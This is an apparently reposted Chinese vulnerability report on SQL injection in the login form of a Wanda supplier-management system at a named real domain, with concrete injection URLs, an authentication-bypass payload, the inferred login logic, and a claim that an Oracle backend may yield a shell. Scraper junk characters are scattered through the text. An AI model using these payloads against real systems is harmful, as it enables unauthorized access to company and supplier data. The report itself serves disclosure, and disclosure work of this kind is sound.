万达供应商系统SQL注射漏洞

admin

简要描述：万达某分站sql注入。敏感信息泄露。
' l2 n. O$ f. b) W详细说明：
万达scm系统登陆框sql注入。

http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27


500错误。

用户名随便输，提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
http://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
4 Z; z- E1 {' D" Y7 e) T0 K截图有一点问题，用户名，和密码输入' and 1=1 --可以得到相同的提示，可自测。）
) U$ Y, {  @* S/ D7 x经过分析，登陆验证的过程应该是：

取用户名查询数据库，有该用户，再用该用户密码和输入的密码进行比对，相同则登陆成功。
8 h- b" ?* q8 m% jhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png

oracle数据库，存在注入点。@大连万达，你怎么看？
9 k3 K6 @) n2 g" {8 g; I- V) ^7 `2 Whttp://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png

$ e0 W6 s" G* `1 g) [: R  J系统里有万达的供应商资料什么的,提交数据的地方随便输入'，提交500错误。没深入。目测可shell。
漏洞证明：
7 ^( a. g! g, m3 I万达scm系统登陆框sql注入。

http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
% m. c: z1 _9 I- ^7 K( e% Z; Y
( }' b+ @6 v+ V7 p  R( v6 p4 M* A
500错误。

用户名随便输，提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
9 R% e  ?5 ^) K& u  J0 Y0 G7 [" i- Ahttp://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png

' S6 W( }( h  a8 D6 v
6 ^" a8 f6 _2 y* H  X（截图有一点问题）

0 Z, z; D* J8 \2 P! N+ N怎么饶都饶不过去；经过分析，登陆验证的过程应该是：

0 x4 Q4 l, m! b; q' M取用户名查询数据库，有该用户，再用该用户密码和输入的密码进行比对，相同则登陆成功。
- L# h& q. w( I2 w/ e8 Q
* \6 l6 {7 X+ B! v7 J绕过：
7 k* b# n% _* F: A/ c# Z3 g2 Ghttp://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1


oracle数据库，存在注入点。@大连万达，你怎么看？
+ N3 g* _4 S3 c​系统里有万达的供应商资料什么的，有发布公告，没深入。目测可shell。

修复方案：
。。。

9 j2 Z2 A. R) \) ~4 M
厂商已经确认
( g5 J( G9 s5 Q1 Z% m9 g
[/td][/tr]
[/table]

+ m2 v8 ?! N. J3 R